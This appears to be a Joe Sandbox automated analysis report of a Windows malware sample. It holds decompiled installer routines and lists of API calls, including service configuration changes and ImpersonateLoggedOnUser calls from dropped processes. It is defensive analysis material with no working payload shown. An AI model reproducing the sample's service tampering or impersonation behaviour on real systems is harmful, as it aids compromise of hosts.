Strings
• C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00A94851
Memory Dump Source
• Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
• Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
Similarity
• API ID: Local$Alloc$FreeLoadMessageString
• String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
• API String ID: 359063898-1610346413
• Opcode ID: dd0adf586c342be019ed543e04a75a85895530164614a1461dba7b02bfcb4050
• Instruction ID: f16fc726ee13bcd084f308ae7f9ab3397ebb48c64eda13632b53b19eca2e8ea6
• Opcode Fuzzy Hash: dd0adf586c342be019ed543e04a75a85895530164614a1461dba7b02bfcb4050
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5D11C2797046416FDF24DFA49C58F773BAAEBCA300F14C55AEA829B251DE358C078760
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A93680(void* __ecx) {
                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                            				struct tagMSG _v36;
                                                                                                                                                                                                                                            				int _t8;
                                                                                                                                                                                                                                            				struct HWND__* _t16;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_v8 = __ecx;
                                                                                                                                                                                                                                            				_t16 = 0;
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                                                                                                                                                                                                            					if(_t8 == 0) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							if(_v36.message != 0x12) {
                                                                                                                                                                                                                                            								DispatchMessageA( &_v36);
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t16 = 1;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                                                                                                                                                                                                            						} while (_t8 != 0);
                                                                                                                                                                                                                                            						if(_t16 == 0) {
                                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					break;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t8;
                                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00A9369F
                                                                                                                                                                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00A936B2
                                                                                                                                                                                                                                            • DispatchMessageA.USER32(?), ref: 00A936CB
                                                                                                                                                                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00A936DA
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2776232527-0
                                                                                                                                                                                                                                            • Opcode ID: 6636c9ec1773a1210f0576370f744e55f44e9cce52a023d82cfe7545a753e948
                                                                                                                                                                                                                                            • Instruction ID: c0d51a56f3d1165de9dea7f1c77a8c37039630edeef9f7ea3022a3fab9db44f7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6636c9ec1773a1210f0576370f744e55f44e9cce52a023d82cfe7545a753e948
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 84016773B0025577DF308BE65C48EEB76BCEBC5B10F14021BFA15E2184D965CA45C6A1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 77%
                                                                                                                                                                                                                                            			E00A96517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
                                                                                                                                                                                                                                            				struct HRSRC__* _t6;
                                                                                                                                                                                                                                            				void* _t21;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t23;
                                                                                                                                                                                                                                            				int _t24;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t23 =  *0xa99a3c; // 0xa90000
                                                                                                                                                                                                                                            				_t6 = FindResourceA(_t23, __edx, 5);
                                                                                                                                                                                                                                            				if(_t6 == 0) {
                                                                                                                                                                                                                                            					L6:
                                                                                                                                                                                                                                            					E00A944B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					_t24 = _a16;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t21 = LoadResource(_t23, _t6);
                                                                                                                                                                                                                                            					if(_t21 == 0) {
                                                                                                                                                                                                                                            						goto L6;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						if(_a12 != 0) {
                                                                                                                                                                                                                                            							_push(_a12);
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                                                                                                                                                                                                            						FreeResource(_t21);
                                                                                                                                                                                                                                            						if(_t24 == 0xffffffff) {
                                                                                                                                                                                                                                            							goto L6;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t24;
                                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00A90000,000007D6,00000005), ref: 00A9652A
                                                                                                                                                                                                                                            • LoadResource.KERNEL32(00A90000,00000000,?,?,00A92EE8,00000000,00A919E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00A96538
                                                                                                                                                                                                                                            • DialogBoxIndirectParamA.USER32(00A90000,00000000,00000547,00A919E0,00000000), ref: 00A96557
                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,?,?,00A92EE8,00000000,00A919E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00A96560
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
• Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1214682469-0
                                                                                                                                                                                                                                            • Opcode ID: 0754cea9740faaf09ce33f759f747d677b9ad152d80291e02e966461d2f17d72
                                                                                                                                                                                                                                            • Instruction ID: 7fff8f9e40d0fe7e8298db93c2ab598f2212b00034e5a06050db7e4b98d57819
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0754cea9740faaf09ce33f759f747d677b9ad152d80291e02e966461d2f17d72
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9A012672300615BBCF109FA99C08DBB7AACEF89360F01012BFE0093150DB718C1286E1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 72%
                                                                                                                                                                                                                                            			E00A965E8(char* __ecx) {
                                                                                                                                                                                                                                            				char _t3;
                                                                                                                                                                                                                                            				char _t10;
                                                                                                                                                                                                                                            				char* _t12;
                                                                                                                                                                                                                                            				char* _t14;
                                                                                                                                                                                                                                            				char* _t15;
                                                                                                                                                                                                                                            				CHAR* _t16;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t12 = __ecx;
                                                                                                                                                                                                                                            				_t15 = __ecx;
                                                                                                                                                                                                                                            				_t14 =  &(__ecx[1]);
                                                                                                                                                                                                                                            				_t10 = 0;
                                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                                            					_t3 =  *_t12;
                                                                                                                                                                                                                                            					_t12 =  &(_t12[1]);
                                                                                                                                                                                                                                            				} while (_t3 != 0);
                                                                                                                                                                                                                                            				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					_t16 = CharPrevA(_t15, ??);
                                                                                                                                                                                                                                            					if(_t16 <= _t15) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if( *_t16 == 0x5c) {
                                                                                                                                                                                                                                            						L7:
                                                                                                                                                                                                                                            						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                                                                                                                                                                                                            							_t16 = CharNextA(_t16);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *_t16 = _t10;
                                                                                                                                                                                                                                            						_t10 = 1;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_push(_t16);
                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L11:
                                                                                                                                                                                                                                            					return _t10;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if( *_t16 == 0x5c) {
                                                                                                                                                                                                                                            					goto L7;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				goto L11;
                                                                                                                                                                                                                                            			}










                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00A92B33), ref: 00A96602
                                                                                                                                                                                                                                            • CharPrevA.USER32(?,00000000), ref: 00A96612
                                                                                                                                                                                                                                            • CharPrevA.USER32(?,00000000), ref: 00A96629
                                                                                                                                                                                                                                            • CharNextA.USER32(00000000), ref: 00A96635
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Char$Prev$Next
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3260447230-0
                                                                                                                                                                                                                                            • Opcode ID: 259791afbe62fcad4c9b08c7f7fa43d2e11d73258d3a3d34d601f2859685d3e4
                                                                                                                                                                                                                                            • Instruction ID: 513ee1d8b36cf1e354daf22369da6584cdfe0a062a310d5c4f80e2dc31ca49ff
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 259791afbe62fcad4c9b08c7f7fa43d2e11d73258d3a3d34d601f2859685d3e4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ACF028323041906EEF365B698C88DBBBFDCCF9B364B3A02AFE59582001DA150D0786A1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A969B0() {
                                                                                                                                                                                                                                            				intOrPtr* _t4;
                                                                                                                                                                                                                                            				intOrPtr* _t5;
                                                                                                                                                                                                                                            				void* _t6;
                                                                                                                                                                                                                                            				intOrPtr _t11;
                                                                                                                                                                                                                                            				intOrPtr _t12;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				 *0xa981f8 = E00A96C70();
                                                                                                                                                                                                                                            				__set_app_type(E00A96FBE(2));
                                                                                                                                                                                                                                            				 *0xa988a4 =  *0xa988a4 | 0xffffffff;
                                                                                                                                                                                                                                            				 *0xa988a8 =  *0xa988a8 | 0xffffffff;
                                                                                                                                                                                                                                            				_t4 = __p__fmode();
                                                                                                                                                                                                                                            				_t11 =  *0xa98528; // 0x0
                                                                                                                                                                                                                                            				 *_t4 = _t11;
                                                                                                                                                                                                                                            				_t5 = __p__commode();
                                                                                                                                                                                                                                            				_t12 =  *0xa9851c; // 0x0
                                                                                                                                                                                                                                            				 *_t5 = _t12;
                                                                                                                                                                                                                                            				_t6 = E00A97000();
                                                                                                                                                                                                                                            				if( *0xa98000 == 0) {
                                                                                                                                                                                                                                            					__setusermatherr(E00A97000);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				E00A971EF(_t6);
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00A96FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00A96FC5
                                                                                                                                                                                                                                            • __set_app_type.MSVCRT ref: 00A969C2
                                                                                                                                                                                                                                            • __p__fmode.MSVCRT ref: 00A969D8
                                                                                                                                                                                                                                            • __p__commode.MSVCRT ref: 00A969E6
                                                                                                                                                                                                                                            • __setusermatherr.MSVCRT ref: 00A96A07
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1632413811-0
                                                                                                                                                                                                                                            • Opcode ID: 9e1bbcd8aa3e5cf114a7cc95fec459383898e7e66efa54e41f3b1e8fbb65e1a9
                                                                                                                                                                                                                                            • Instruction ID: dd3c3ba7d22f4b52861300945e2225c069524c56f88487221ced9ddc92d363cd
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9e1bbcd8aa3e5cf114a7cc95fec459383898e7e66efa54e41f3b1e8fbb65e1a9
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1BF0F8703083018FCB54EBB4AE4A6583BA1FB16321B50460BE462862F0CF3E8556CA21
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                            Execution Coverage:49.6%
                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                            Signature Coverage:22.9%
                                                                                                                                                                                                                                            Total number of Nodes:35
                                                                                                                                                                                                                                            Total number of Limit Nodes:2

                                                                                                                                                                                                                                            Callgraph

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.331042064.00007FF815F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF815F50000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff815f50000_atn32.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: NameUser
                                                                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                                                                            • API String ID: 2645101109-2766056989
                                                                                                                                                                                                                                            • Opcode ID: fe845de2e4baa0d7ed072dd1ba3015e0ad32c9c12d7c3f1f8e66e283fa4487ae
                                                                                                                                                                                                                                            • Instruction ID: 0695481b314bd8c81cc493ff736064183dea9829bdf6f0cfb860d8b8220fbb56
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fe845de2e4baa0d7ed072dd1ba3015e0ad32c9c12d7c3f1f8e66e283fa4487ae
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 63918F30618A4D8FEB68DF28C8457E977D1EF55351F00417AE84ECB292DF74A481CB81
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.331042064.00007FF815F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF815F50000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff815f50000_atn32.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ChangeConfigService
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3849694230-0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
control_flow_graph: node and edge listing omitted; API call node: OpenServiceA
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.331042064.00007FF815F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF815F50000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff815f50000_atn32.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
control_flow_graph: node and edge listing omitted; API call node: OpenServiceA
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.331042064.00007FF815F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF815F50000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff815f50000_atn32.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: OpenService
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3098006287-0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
control_flow_graph: node and edge listing omitted; API call node: OpenSCManagerW
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.331042064.00007FF815F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF815F50000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff815f50000_atn32.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ManagerOpen
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1889721586-0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
control_flow_graph: node and edge listing omitted; API call node: ControlService
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.331042064.00007FF815F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF815F50000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff815f50000_atn32.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ControlService
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 253159669-0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
control_flow_graph: node and edge listing omitted; API call node: FindCloseChangeNotification
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.331042064.00007FF815F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF815F50000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff815f50000_atn32.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2591292051-0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 204 7ff815f51760-7ff815f51767 205 7ff815f51769-7ff815f51771 204->205 206 7ff815f51772-7ff815f51802 ImpersonateLoggedOnUser 204->206 205->206 209 7ff815f5180a-7ff815f51831 206->209 210 7ff815f51804 206->210 210->209
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.331042064.00007FF815F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF815F50000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff815f50000_atn32.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ImpersonateLoggedUser
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2216092060-0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.397974751.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1620000_bvr38xq.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.397974751.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1620000_bvr38xq.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.397974751.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1620000_bvr38xq.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.397974751.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1620000_bvr38xq.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: kfq^
                                                                                                                                                                                                                                            • API String ID: 0-449628588
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.397974751.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1620000_bvr38xq.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: kfq^
                                                                                                                                                                                                                                            • API String ID: 0-449628588
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.397974751.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1620000_bvr38xq.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: fq^
                                                                                                                                                                                                                                            • API String ID: 0-3723657888
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000004.00000002.397974751.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1620000_bvr38xq.jbxd
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

